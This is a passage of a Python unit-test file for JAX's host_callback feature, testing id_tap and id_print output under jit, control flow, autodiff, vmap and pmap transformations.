logging.info(f"{self._testMethodName}: found output {testing_stream.output}")
self.assertEqual(
len(local_devices()), len(re.findall(r"111", testing_stream.output)))
self.assertEqual(
len(local_devices()), len(re.findall(r"112", testing_stream.output)))
@parameterized.named_parameters(
jtu.cases_from_list(
dict(
testcase_name=f"_with_jit_{with_jit}",
with_jit=with_jit)
for with_jit in [True, False]))
def test_tap_pytree(self, with_jit=False):
def func(x, what=""):
"""Returns some pytrees depending on x"""
if what == "pair_1_x":
return (1, x)
elif what == "pair_x_2x":
return (x, 2 * x)
elif what == "dict":
return dict(a=2 * x, b=3 * x)
else:
assert False
tap_count = 0
def tap_func(a, _, *, what=""):
nonlocal tap_count
tap_count += 1
self.assertEqual(func(5, what), a)
transform = api.jit if with_jit else lambda f: f
for what in ("pair_1_x", "pair_x_2x", "dict"):
transformed = transform(
lambda x: hcb.id_tap(
partial(tap_func, what=what),
func(x, what),
result=func(x * 2, what))
)(5)
self.assertEqual(func(10, what), transformed)
hcb.barrier_wait() # Wait for receivers to be done
self.assertEqual(3, tap_count)
@parameterized.named_parameters(
jtu.cases_from_list(
dict(
testcase_name=f"_concurrent_{concurrent}",
concurrent=concurrent)
for concurrent in [True, False]))
def test_tap_multiple(self, concurrent=False):
"""Call id_tap multiple times, concurrently or in sequence. """
if concurrent and jtu.device_under_test() in ["cpu", "gpu"]:
# TODO(necula): if there is device side concurrency, outfeeds from
# different computations can be interleaved. For example, it seems that
# on GPU if multiple host threads run a jit computation, the multiple
# computations are interleaved on the GPU. This can result in the outfeed
# trains being interleaved, which will trigger an error.
# The solution is to fix on GPU the receiving logic so that we can outfeed
# the train as one tuple, and receive it one piece as a time. Then the
# trains should be atomic.
# See also b/160692602.
raise SkipTest("concurrent id_tap not supported on CPU, GPU")
received = set()
count = 5
def pause_tap(idx, _):
received.add(int(idx))
logging.info(f"Starting do_tap {idx}. Sleeping 1sec ...")
time.sleep(0.3)
logging.info(f"Finish do_tap {idx}")
def do_tap(idx):
api.jit(lambda idx: hcb.id_tap(pause_tap, idx))(idx)
if concurrent:
threads = [
threading.Thread(
name=f"enqueue_tap_{idx}", target=do_tap, args=(idx,))
for idx in range(count)
]
[t.start() for t in threads]
[t.join() for t in threads]
else:
for idx in range(count):
do_tap(idx)
hcb.barrier_wait()
self.assertEqual(received, set(range(count)))
# TODO(necula): see comment for test_multiple_tap. Here we disable also
# on TPU, because the barrier_wait runs on all devices, including on the CPU
# where it would run into concurrency problems.
@skip("Concurrency not supported")
def test_tap_multiple_barriers(self):
"""Call barrier_wait concurrently."""
def pause_tap(*args, **kwargs):
logging.info("pause_tap waiting")
time.sleep(0.3)
logging.info("pause_tap done")
def long_run(x):
return hcb.id_tap(pause_tap, x)
api.jit(long_run)(5.)
def try_barrier(idx):
logging.info(f"Starting test barrier {idx}")
hcb.barrier_wait()
logging.info(f"Finished test barrier {idx}")
threads = [
threading.Thread(
name=f"barrier_{idx}", target=try_barrier, args=(idx,))
for idx in range(3)
]
[t.start() for t in threads]
[t.join() for t in threads]
@parameterized.named_parameters(
jtu.cases_from_list(
dict(
testcase_name=f"_with_jit_{with_jit}",
with_jit=with_jit)
for with_jit in [True, False]))
def test_tap_cond(self, with_jit=False):
"""A conditional"""
def func(x):
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
x2 = hcb.id_print(x1 + 1, where="2", output_stream=testing_stream)
x4 = lax.cond(x % 2 == 0,
lambda x: hcb.id_print(x, where="cond_t",
output_stream=testing_stream),
lambda x: hcb.id_print(-1, where="cond_f", result=x,
output_stream=testing_stream),
x2 + 1)
x5 = hcb.id_print(x4 + 1, where="end", output_stream=testing_stream)
return x5
transform = api.jit if with_jit else lambda f: f
self.assertEqual(4, transform(func)(1))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
where: 1
1
where: 2
2
where: cond_f
-1
where: end
4""", testing_stream.output)
@parameterized.named_parameters(
jtu.cases_from_list(
dict(testcase_name=f"_with_jit_{with_jit}",
with_jit=with_jit)
for with_jit in [True, False]))
def test_tap_while_cond(self, with_jit=False):
def func(x):
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
x2 = hcb.id_print(x1 + 1, where="2", output_stream=testing_stream)
def body(x):
x3 = hcb.id_print(x, where="w_b_1", output_stream=testing_stream)
x4 = lax.cond(x % 2 == 0,
lambda x: hcb.id_print(x, where="w_b_t",
output_stream=testing_stream),
lambda x: hcb.id_print(-1, where="w_b_f",
result=x, output_stream=testing_stream),
x3 + 1)
return hcb.id_print(x4, where="w_b_2", output_stream=testing_stream)
x10 = lax.while_loop(lambda x: x <= 3, body, x2)
res = hcb.id_print(x10, where="end", output_stream=testing_stream)
return res
transform = api.jit if with_jit else lambda f: f
self.assertEqual(4, transform(func)(1))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
where: 1
1
where: 2
2
where: w_b_1
2
where: w_b_t
3
where: w_b_2
3
where: w_b_1
3
where: w_b_f
-1
where: w_b_2
4
where: end
4""", testing_stream.output)
def test_tap_jit_while_pred_tap(self):
"""While with printing in the conditional."""
def func(x):
x1 = hcb.id_print(x, where="1")
x10 = lax.while_loop(lambda x: hcb.id_print(x < 3,
where="w_p",
output_stream=testing_stream),
lambda x: hcb.id_print(x + 1, where="w_b",
output_stream=testing_stream),
x1)
res = hcb.id_print(x10, where="3", output_stream=testing_stream)
return res
self.assertEqual(3, api.jit(func)(1))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self,
"""
where: w_p
True
where: w_b
2
where: w_p
True
where: w_b
3
where: w_p
False
where: 3
3""", testing_stream.output)
@parameterized.named_parameters(
jtu.cases_from_list(
dict(
testcase_name=f"_with_jit_{with_jit}",
with_jit=with_jit)
for with_jit in [True, False]))
def test_tap_scan_cond(self, with_jit=True):
def func(x):
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
x2 = hcb.id_print(x1 + 1, where="2", output_stream=testing_stream)
def body(c, x):
x3 = hcb.id_print(x, where="s_1", output_stream=testing_stream)
x4 = lax.cond(x % 2 == 0,
lambda x: hcb.id_print(x, where="s_t", output_stream=testing_stream),
lambda x: hcb.id_print(-1, where="s_f", result=x, output_stream=testing_stream),
x3 + 1)
return (c, hcb.id_print(x4, where="s_2", output_stream=testing_stream))
_, x10 = lax.scan(body, x2, jnp.arange(3))
res = hcb.id_print(x10, where="10", output_stream=testing_stream)
return res
if with_jit:
func = api.jit(func)
res = func(1)
self.assertAllClose(jnp.array([1, 2, 3]), res)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
where: 1
1
where: 2
2
where: s_1
0
where: s_t
1
where: s_2
1
where: s_1
1
where: s_f
-1
where: s_2
2
where: s_1
2
where: s_t
3
where: s_2
3
where: 10
[1 2 3]""", testing_stream.output)
testing_stream.reset()
@parameterized.named_parameters(
jtu.cases_from_list(
dict(
testcase_name=f"_shape_{shape}_dtype_{np.dtype(dtype).name}_nr_args={nr_args}",
shape=shape,
dtype=dtype,
nr_args=nr_args) for nr_args in [1, 2]
for shape in [(), (2,), (2, 3), (2, 3, 4)]
for dtype in jtu.dtypes.all))
def test_tap_jit_dtypes(self, nr_args=2, dtype=jnp.int16, shape=(2,)):
if dtype in (jnp.complex64, jnp.complex128, jnp.bool_):
raise SkipTest(f"host_callback not implemented for {dtype}.")
if dtype == np.bool_:
args = [np.random.choice(a=[True, False], size=shape)]
else:
args = [jnp.arange(np.prod(shape), dtype=dtype).reshape(shape)]
if nr_args > 1:
args = args * nr_args
jit_fun1 = api.jit(lambda xs: hcb.id_print(
xs,
a_new_test="************",
testcase_name=f"shape_{shape}_dtype_{dtype}_nr_args={nr_args}"))
res = jit_fun1(args)
self.assertAllClose(args, res, check_dtypes=True)
def test_tap_jit_large(self):
arg = jnp.arange(10000, dtype=jnp.int32).reshape((10, 10, 5, -1))
api.jit(hcb.id_print)(arg)
def test_tap_jit_several_together(self):
arg = jnp.arange(50, dtype=jnp.int32).reshape((10, 5))
api.jit(lambda x, y: hcb.id_print((x, y, x * 2.)))(arg, jnp.ones(100, dtype=jnp.int32))
def test_tap_jit_interleaving(self):
# Several jit's without data dependencies; they may interfere
count = 0 # Count tap invocations
nr_arrays = 5
def tap_func(arg, _):
nonlocal count
assert len(arg) == nr_arrays
count += 1
# This is the function that we'll run multiple times
def func(x, count):
for i in range(count):
x = hcb.id_tap(tap_func, [x + i for i in range(nr_arrays)])[-1]
return x
x = jnp.array(1, dtype=np.int32)
res = 0
for _ in range(10):
# No dependencies between the jit invocations
res += api.jit(lambda x: func(x, 10))(x)
hcb.barrier_wait()
self.assertEqual(100, count)
def test_tap_jit_tap_exception(self):
if not FLAGS.jax_host_callback_outfeed:
raise SkipTest("TODO: implement error handling for customcall")
# Simulate a tap error
def tap_err(*args, **kwargs):
raise NotImplementedError
def func(x):
x1 = hcb.id_print(x + 1, what="x1", output_stream=testing_stream)
x2 = hcb.id_tap(tap_err, x1 + 1)
x3 = hcb.id_print(x2 + 1, what="x3", output_stream=testing_stream)
return x3
res = api.jit(func)(0) # No error yet
with self.assertRaises(hcb.CallbackException):
hcb.barrier_wait()
# Even though the receiver thread raised, the main thread should still
# return 3.
self.assertEqual(3, res)
# We should have received all others
assertMultiLineStrippedEqual(self, """
what: x1
1
what: x3
3""", testing_stream.output)
def test_tap_while(self):
"""Executing while, even without JIT uses compiled code"""
y = jnp.ones(5) # captured const
def func(x):
return lax.while_loop(
lambda c: c[1] < 5,
lambda c: (y, hcb.id_print(c[1], output_stream=testing_stream) + 1),
(x, 1))
func(y)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
1
2
3
4""", testing_stream.output)
def test_tap_jvp(self):
jvp_fun1 = lambda x, xt: api.jvp(fun1, (x,), (xt,))
res_primals, res_tangents = jvp_fun1(jnp.float32(5.), jnp.float32(0.1))
self.assertAllClose(100., res_primals, check_dtypes=False)
self.assertAllClose(4., res_tangents, check_dtypes=False)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
transforms: ['jvp'] what: a * 2
( 10.00
0.20 )
transforms: ['jvp'] what: y * 3
( 30.00
0.60 )""", testing_stream.output)
def test_tap_grad_primal_unused(self):
# The output of id_print is not needed for backwards pass
def func(x):
return 2. * hcb.id_print(x * 3., what="x * 3",
output_stream=testing_stream)
grad_func = api.grad(func)
arg = jnp.float32(5.)
jaxpr = str(api.make_jaxpr(grad_func)(arg))
# making the Jaxpr does not print anything
hcb.barrier_wait()
treedef = tree_util.tree_structure(arg)
assertMultiLineStrippedEqual(self, f"""
{{ lambda ; a.
let b = mul a 3.00
c = outside_call[ arg_treedef={treedef}
callback=...
identity=True
transforms=( ) ] b
_ = mul c 2.00
d = mul 1.00 2.00
_ = broadcast_in_dim[ broadcast_dimensions=( )
shape=( ) ] 0.00
e = outside_call[ arg_treedef={treedef}
callback=...
identity=True
transforms=(('jvp',), ('transpose',)) ] d
f = mul e 3.00
in (f,) }}""", jaxpr)
assertMultiLineStrippedEqual(self, "", testing_stream.output)
testing_stream.reset()
res_grad = grad_func(arg)
hcb.barrier_wait()
self.assertAllClose(6., res_grad, check_dtypes=False)
assertMultiLineStrippedEqual(self, """
what: x * 3
15.00
transforms: ['jvp', 'transpose'] what: x * 3
2.00""", testing_stream.output)
def test_tap_grad_simple(self):
def func(x):
y = hcb.id_print(x * 2., what="x * 2", output_stream=testing_stream)
return x * hcb.id_print(y * 3., what="y * 3",
output_stream=testing_stream)
grad_func = api.grad(func)
res_grad = grad_func(jnp.float32(5.))
self.assertAllClose(2. * 5. * 6., res_grad, check_dtypes=False)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
what: x * 2
10.00
what: y * 3
30.00
transforms: ['jvp', 'transpose'] what: y * 3
5.00
transforms: ['jvp', 'transpose'] what: x * 2
15.00""", testing_stream.output)
def test_tap_grad_grad(self):
def func(x):
y = hcb.id_print(x * 2., what="x * 2", output_stream=testing_stream)
return x * (y * 3.)
grad_func = api.grad(api.grad(func))
# making the Jaxpr does not print anything
_ = api.make_jaxpr(grad_func)(5.)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, "", testing_stream.output)
res_grad = grad_func(jnp.float32(5.))
self.assertAllClose(12., res_grad, check_dtypes=False)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
what: x * 2
10.00
transforms: ['jvp', 'transpose'] what: x * 2
15.00
transforms: ['jvp', 'transpose'] what: x * 2
3.00
transforms: ['jvp', 'transpose', 'jvp', 'transpose'] what: x * 2
2.00""", testing_stream.output)
def test_tap_grad_pytree(self):
def func(x):
x4, x5 = hcb.id_print((x * 2., x * 3.), what="pair",
result=(x * 4., x * 5.),
output_stream=testing_stream)
return x4 + 2. * x5
x = jnp.float32(5.)
grad_func = api.grad(func)
print(api.make_jaxpr(grad_func)(x))
res_grad = grad_func(x)
self.assertAllClose(14., res_grad, check_dtypes=False)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
what: pair
( 10.00
15.00 )
transforms: ['jvp', 'transpose'] what: pair
( 0.00
0.00 )""", testing_stream.output)
def test_tap_jvp_float0(self):
def f(x, yint):
x, yint = hcb.id_tap(lambda arg, _: arg, (x, yint))
return x * yint
res = api.jvp(f, (2., 3), (0.2, np.zeros((), dtypes.float0)))
self.assertAllClose((6., 0.6), res)
def test_tap_grad_float0(self):
def func(x, yint):
x, yint = hcb.id_print((x, yint), what="pair", output_stream=testing_stream)
return x * yint
grad_func = api.grad(func)
res_grad = grad_func(jnp.float32(5.), jnp.int32(2))
self.assertAllClose(2., res_grad, check_dtypes=False)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
what: pair
( 5.00
2 )
transforms: ['jvp', 'transpose'] what: pair
( 2.00
False )""", testing_stream.output)
def test_tap_grad_float0_result(self):
# https://github.com/google/jax/issues/7340
# x is a Tuple[f32[2], s32[3]]
x = (np.array([.7, .8], dtype=np.float32),
np.array([11, 12, 13], dtype=np.int32))
def f_jax(x):
x = hcb.id_print(x, result=x, output_stream=testing_stream) # result= is important
return (3. * x[0], x[1])
def f_jax_vjp(x):
res, pullback = jax.vjp(f_jax, x)
g, = pullback((np.ones(x[0].shape, dtype=x[0].dtype),
np.zeros(x[1].shape, dtype=dtypes.float0)))
return g
g = f_jax_vjp(x)
self.assertAllClose(np.array([3., 3.], dtype=np.float32), g[0])
self.assertEqual(dtypes.float0, g[1].dtype)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
( [0.70 0.80]
[11 12 13] )
transforms: ['jvp', 'transpose']
( [0.00 0.00]
[False False False] )""", testing_stream.output)
def test_tap_higher_order_grad_float0_result(self):
# https://github.com/google/jax/issues/7340
# x is a Tuple[f32[2], s32[3]]
x = (np.array([.7, .8], dtype=np.float32),
np.array([11, 12, 13], dtype=np.int32))
def f_jax(x):
x = hcb.id_print(x, result=x, output_stream=testing_stream) # result= is important
return (jnp.sin(x[0]), x[1])
def wrap_vjp(f, args, res_f_of_args):
# Given a function "f" and "args" return the f_vjp and args_vjp
def make_ct(res):
res_dtype = np.result_type(res)
if res_dtype == dtypes.float0:
return res
ct_dtype = core.primal_dtype_to_tangent_dtype(res_dtype)
return np.ones(np.shape(res), dtype=ct_dtype)
cts = tree_util.tree_map(make_ct, res_f_of_args)
def f_vjp(args, cts):
res, pullback = jax.vjp(f, *args)
return pullback(cts)
return (f_vjp, (args, cts))
res = f_jax(x)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
( [0.70 0.80]
[11 12 13] )""", testing_stream.output)
testing_stream.reset()
# 1st order
f_jax_vjp1, args_vjp1 = wrap_vjp(f_jax, (x,), res)
res_vjp1 = f_jax_vjp1(*args_vjp1)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
( [0.70 0.80]
[11 12 13] )
transforms: ['jvp', 'transpose']
( [0.00 0.00]
[False False False] )""", testing_stream.output)
testing_stream.reset()
# 2nd order
f_jax_vjp2, args_vjp2 = wrap_vjp(f_jax_vjp1, args_vjp1, res_vjp1)
res_vjp2 = f_jax_vjp2(*args_vjp2)
# 3rd order
f_jax_vjp3, args_vjp3 = wrap_vjp(f_jax_vjp2, args_vjp2, res_vjp2)
_ = f_jax_vjp3(*args_vjp3)
def test_tap_vmap(self):
vmap_fun1 = api.vmap(fun1)
vargs = jnp.array([jnp.float32(4.), jnp.float32(5.)])
vmap_fun1(vargs)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
transforms: [('batch', {'batch_dims': (0,)})] what: a * 2
[ 8.00 10.00]
transforms: [('batch', {'batch_dims': (0,)})] what: y * 3
[24.00 30.00]""", testing_stream.output)
def test_tap_vmap_not_batched(self):
x = 3.
def func(y):
# x is not mapped, y is mapped
_, y = hcb.id_print((x, y), output_stream=testing_stream)
return x + y
vmap_func = api.vmap(func)
vargs = jnp.array([jnp.float32(4.), jnp.float32(5.)])
_ = vmap_func(vargs)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
transforms: [('batch', {'batch_dims': (None, 0)})]
( 3.00
[4.00 5.00] )""", testing_stream.output)
def test_tap_vmap_vmap(self):
# A 2D tensor with x[i, j] = i + j using 2 vmap
def sum(x, y):
return hcb.id_print(x + y, output_stream=testing_stream)
def sum_rows(xv, y):
return api.vmap(sum, in_axes=(0, None))(xv, y)
def sum_all(xv, yv):
return api.vmap(sum_rows, in_axes=(None, 0))(xv, yv)
xv = jnp.arange(5, dtype=np.int32)
yv = jnp.arange(3, dtype=np.int32)
# assertMultiLineStrippedEqual(self, "", str(api.make_jaxpr(sum_all)(xv, yv)))
_ = sum_all(xv, yv)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
transforms: [('batch', {'batch_dims': (0,)}), ('batch', {'batch_dims': (0,)})]
[[0 1 2 3 4]
[1 2 3 4 5]
[2 3 4 5 6]]""", testing_stream.output)
def test_tap_vmap_while(self):
"""Vmap of while."""
def func(x):
# like max(x, 2)
x1 = hcb.id_print(x, where="before:x", output_stream=testing_stream)
x2 = lax.while_loop(
lambda x: x < 2, lambda x: hcb.id_print(
x + 1, where="body:x+1", output_stream=testing_stream), x1)
res = hcb.id_print(x2, where="after:x", output_stream=testing_stream)
return res
inputs = np.arange(5, dtype=np.int32)
self.assertAllClose(
np.array([2, 2, 2, 3, 4]),
api.jit(api.vmap(func))(inputs),
check_dtypes=False)
hcb.barrier_wait()
assertMultiLineStrippedEqual(
self, """
transforms: [('batch', {'batch_dims': (0,)})] where: before:x
[0 1 2 3 4]
transforms: [('batch', {'batch_dims': (0,)})] where: body:x+1
[1 2 3 4 5]
transforms: [('batch', {'batch_dims': (0,)})] where: body:x+1
[2 3 3 4 5]
transforms: [('batch', {'batch_dims': (0,)})] where: after:x
[2 2 2 3 4]""", testing_stream.output)
def test_tap_vmap_while_tap_cond(self):
"""Vmap of while, with a tap in the conditional."""
def func(x):
# like max(x, 2)
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
x2 = lax.while_loop(lambda x: hcb.id_print(x < 2, where="w_c",
output_stream=testing_stream),
lambda x: hcb.id_print(x + 1, where="w_b",
output_stream=testing_stream),
x1)
res = hcb.id_print(x2, where="3", output_stream=testing_stream)
return res
inputs = np.arange(5, dtype=np.int32)
res = api.jit(api.vmap(func))(inputs)
hcb.barrier_wait()
self.assertAllClose(np.array([2, 2, 2, 3, 4]), res, check_dtypes=False)
assertMultiLineStrippedEqual(self, """
transforms: [('batch', {'batch_dims': (0,)})] where: 1
[0 1 2 3 4]
transforms: [('batch', {'batch_dims': (0,)})] where: w_c
[ True True False False False]
transforms: [('batch', {'batch_dims': (0,)})] where: w_b
[1 2 3 4 5]
transforms: [('batch', {'batch_dims': (0,)})] where: w_c
[ True False False False False]
transforms: [('batch', {'batch_dims': (0,)})] where: w_b
[2 3 3 4 5]
transforms: [('batch', {'batch_dims': (0,)})] where: w_c
[False False False False False]
transforms: [('batch', {'batch_dims': (0,)})] where: 3
[2 2 2 3 4]""", testing_stream.output)
def test_tap_transforms(self):
def power3(x):
y = x * x
# Print both 'x' and 'x^2'. Must pack as a tuple.
_, y = hcb.id_print((x, y), what="x,x^2", output_stream=testing_stream)
return y * x
print(f"impl = {power3(3.)}")
hcb.barrier_wait()
expected = """
what: x,x^2
( 3.
9. )"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
print(f"vmap = {jax.vmap(power3)(np.arange(3.))}")
hcb.barrier_wait()
expected = """
transforms: [('batch', {'batch_dims': (0, 0)})] what: x,x^2
( [0. 1. 2.]
[0. 1. 4.] )"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
print(f"jvp = {jax.jvp(power3, (3.,), (0.1,))}")
hcb.barrier_wait()
expected = """
transforms: ['jvp'] what: x,x^2
( ( 3.
9. )
( 0.1
0.6 ) )"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
print(f"grad = {jax.grad(power3)(3.)}")
hcb.barrier_wait()
expected = """
what: x,x^2
( 3.
9. )
transforms: ['jvp', 'transpose'] what: x,x^2
( 0.
3. )"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
print(f"vmap o grad {jax.vmap(jax.grad(power3))(np.array([2., 3.]))}")
hcb.barrier_wait()
expected = """
transforms: [('batch', {'batch_dims': (0, 0)})] what: x,x^2
( [2. 3.]
[4. 9.] )
transforms: ['jvp', 'transpose', ('batch', {'batch_dims': (None, 0)})] what: x,x^2
( 0.
[2. 3.] )"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
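  # The pmap tests below use tap_with_device=True, so each tapped value is prefixed
  # with the device that produced it.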
def test_tap_pmap(self):
if len(local_devices()) < 2:
raise SkipTest("test requires at least 2 devices")
def power3(x):
y = x * x
# Print both 'x' and 'x^2'. Must pack as a tuple.
_, y = hcb.id_print((x, y),
what="x,x^2",
output_stream=testing_stream,
tap_with_device=True)
return y * x
pmap_power3 = api.pmap(power3, devices=local_devices())
xv = np.array([3, 4], dtype=np.int32)
res = pmap_power3(xv)
hcb.barrier_wait()
self.assertAllClose(xv * xv * xv, res, check_dtypes=False)
# Assertion text is for 2 devices (also works for 1 device)
assertMultiDeviceOutputEqual(
self, """
device: cpu:0 what: x,x^2
( 3
9 )
device: cpu:1 what: x,x^2
( 4
16 )""")
def test_tap_pmap_vmap(self):
# A matrix M[ij] = i * 10 + j
nr_devices = len(local_devices())
shape = (nr_devices, 3)
matrix = np.fromfunction(lambda i, j: 10. * i + j, shape,
dtype=np.int32)
def fun1(x, do_print=False): # x: i32
return maybe_print(do_print, x * 2, "x * 2", tap_with_device=True)
pmap_vmap_fun1 = api.pmap(
api.vmap(partial(fun1, do_print=True)), devices=local_devices())
res = pmap_vmap_fun1(matrix)
hcb.barrier_wait()
expected_res = api.pmap(
api.vmap(partial(fun1, do_print=False)), devices=local_devices())(
matrix)
self.assertAllClose(expected_res, res, check_dtypes=False)
# Assertion text is for 2 devices (also works for 1 device)
assertMultiDeviceOutputEqual(self, """
device: cpu:0 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
[0.00 2.00 4.00]
device: cpu:1 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
[20.00 22.00 24.00]""")
def test_tap_pmap_pmap_vmap(self):
# A matrix M[ijk] = i * 100 + j * 10 + k
nr_devices = len(local_devices())
if nr_devices % 2 != 0:
raise SkipTest("test works only on even number of devices")
shape = (2, nr_devices // 2, 3)
matrix = np.fromfunction(lambda i, j, k: 100. * i + 10. * j + k, shape,
dtype=np.float32)
def fun1(x, do_print=False): # x: f32
y = maybe_print(do_print, x * 2., "x * 2", tap_with_device=True)
return y ** 2
pmap_fun1 = api.pmap(
api.pmap(api.vmap(partial(fun1, do_print=True))),
devices=local_devices())
res = pmap_fun1(matrix)
hcb.barrier_wait()
expected_res = api.pmap(
api.pmap(api.vmap(partial(fun1, do_print=False))),
devices=local_devices())(
matrix)
self.assertAllClose(expected_res, res, check_dtypes=False)
# Assertion text is for 2 devices (also works for 1 device)
assertMultiDeviceOutputEqual(self, """
device: cpu:0 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
[0.00 2.00 4.00]
device: cpu:1 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
[200.00 202.00 204.00]""")
@ignore_jit_of_pmap_warning()
def test_tap_pmap_pmap_extra(self):
"""pmap of a pmap surrounded by extra code."""
    # A matrix M[ijk] = i * 100 + j * 10 + k
nr_devices = len(local_devices())
if nr_devices != 2:
raise SkipTest("test works only on 2 devices")
shape = (2, 1, 3)
matrix = np.fromfunction(lambda i, j, k: 100. * i + 10. * j + k, shape,
dtype=np.float32)
def fun(xv, do_print=False):
# This will be printed on all devices, with shape [1, 3]
xv = maybe_print(do_print, xv + 1., "before", tap_with_device=True)
res = api.pmap(lambda x: maybe_print(do_print, x * 2., "inside", tap_with_device=True))(xv)
# This will be printed on all devices, with shape [1, 3]
return maybe_print(do_print, res + 1., "after", tap_with_device=True)
res = api.pmap(partial(fun, do_print=True))(matrix)
self.assertAllClose(fun(matrix, do_print=False), res, check_dtypes=False)
hcb.barrier_wait()
# Assertion text is for 2 devices (also works for 1 device)
assertMultiDeviceOutputEqual(self, """
device: cpu:0 what: before
[[1.00 2.00 3.00]]
device: cpu:0 what: inside
[2.00 4.00 6.00]
device: cpu:0 what: after
[[3.00 5.00 7.00]]
device: cpu:1 what: before
[[101.00 102.00 103.00]]
device: cpu:1 what: inside
[202.00 204.00 206.00]
device: cpu:1 what: after
[[203.00 205.00 207.00]]""")
def test_tap_jvp_pmap_vmap(self):
    # A matrix M[ijk] = i * 100 + j * 10 + k
nr_devices = len(local_devices())
shape = (nr_devices, 2, 3)
matrix = np.fromfunction(lambda i, j, k: 100. * i + 10. * j + k, shape,
dtype=np.float32)
def fun(xv, do_print=False):
# x: f32[3]
return api.jvp(api.pmap(api.vmap(lambda x: maybe_print(do_print, x * 2., "x * 2", tap_with_device=True))),
(xv,), (.1 * jnp.ones_like(xv),))
res = fun(matrix, do_print=True)
hcb.barrier_wait()
expected_res = fun(matrix, do_print=False)
self.assertAllClose(expected_res, res, check_dtypes=False)
# Assertion text is for 2 devices (also works for 1 device)
# Device 0 will get to execute api.jvp(api.vmap(...)) for matrix[0, :, :]
assertMultiDeviceOutputEqual(self, """
device: cpu:0 transforms: [('batch', {'batch_dims': (0,)}), 'jvp'] what: x * 2
( [[ 0.00 2.00 4.00]
[20.00 22.00 24.00]]
[[0.20 0.20 0.20]
[0.20 0.20 0.20]] )
device: cpu:1 transforms: [('batch', {'batch_dims': (0,)}), 'jvp'] what: x * 2
( [[200.00 202.00 204.00]
[220.00 222.00 224.00]]
[[0.20 0.20 0.20]
[0.20 0.20 0.20]] )""")
def test_tap_vmap_pmap(self):
    # A matrix M[ijk] = i * 100 + j * 10 + k
nr_devices = len(local_devices())
shape = (2, nr_devices, 3)
matrix = np.fromfunction(lambda i, j, k: 100. * i + 10. * j + k, shape,
dtype=np.float32)
def fun(xv, do_print=False):
# x: f32[3]
return api.vmap(api.pmap(lambda x: maybe_print(do_print, x * 2., "x * 2", tap_with_device=True)))(xv)
res = fun(matrix, do_print=True)
hcb.barrier_wait()
expected_res = fun(matrix, do_print=False)
self.assertAllClose(expected_res, res, check_dtypes=False)
# Assertion text is for 2 devices (also works for 1 device)
# Device 0 will get to execute api.jvp(api.vmap(...)) for matrix[:, 0, :]
assertMultiDeviceOutputEqual(self, """
device: cpu:0 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
[[ 0.00 2.00 4.00]
[200.00 202.00 204.00]]
device: cpu:1 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
[[ 20.00 22.00 24.00]
[220.00 222.00 224.00]]""")
@ignore_jit_of_pmap_warning()
def test_tap_jit_pmap_extra(self):
"""jit of a pmap surrounded by extra code."""
# A matrix M[ij] = i * 10 + j
nr_devices = len(local_devices())
assert nr_devices in (1, 2)
shape = (nr_devices, 3)
matrix = np.fromfunction(lambda i, j: 10. * i + j, shape,
dtype=np.float32)
def fun(xv, do_print=False):
# This will be printed on all devices with shape (nr_devices, 3)
xv = maybe_print(do_print, xv + 1., "before", tap_with_device=True)
res = api.pmap(lambda x: maybe_print(do_print, x * 2., "inside", tap_with_device=True))(xv)
# This will be printed on all devices with shape (nr_devices, 3)
return maybe_print(do_print, res + 1., "after", tap_with_device=True)
res = api.jit(partial(fun, do_print=True))(matrix)
self.assertAllClose(fun(matrix, do_print=False), res, check_dtypes=False)
hcb.barrier_wait()
if len(local_devices()) == 2:
assertMultiDeviceOutputEqual(self, """
device: cpu:0 what: before
[[ 1.00 2.00 3.00]
[11.00 12.00 13.00]]
device: cpu:0 what: inside
[2.00 4.00 6.00]
device: cpu:0 what: after
[[ 3.00 5.00 7.00]
[23.00 25.00 27.00]]
device: cpu:1 what: before
[[ 1.00 2.00 3.00]
[11.00 12.00 13.00]]
device: cpu:1 what: inside
[22.00 24.00 26.00]
device: cpu:1 what: after
[[ 3.00 5.00 7.00]
[23.00 25.00 27.00]]""")
else:
assert len(local_devices()) == 1
assertMultiDeviceOutputEqual(self, """
device: cpu:0 what: before
[[1.00 2.00 3.00]]
device: cpu:0 what: inside
[2.00 4.00 6.00]
device: cpu:0 what: after
[[3.00 5.00 7.00]]""")
def test_tap_cond_pmap(self):
raise SkipTest("cond of pmap does not work in JAX. Issue #5178.")
# A matrix M[ij] = i * 10 + j
nr_devices = len(local_devices())
shape = (nr_devices, 3)
matrix = np.fromfunction(lambda i, j: 10. * i + j, shape,
dtype=np.float32)
def fun1(x, do_print=False):
return maybe_print(do_print, x * 2., "x * 2")
def fun2(cond, xv, do_print=False):
return lax.cond(cond, api.pmap(partial(fun1, do_print=do_print)),
lambda xv: xv, xv)
res = fun2(True, matrix)
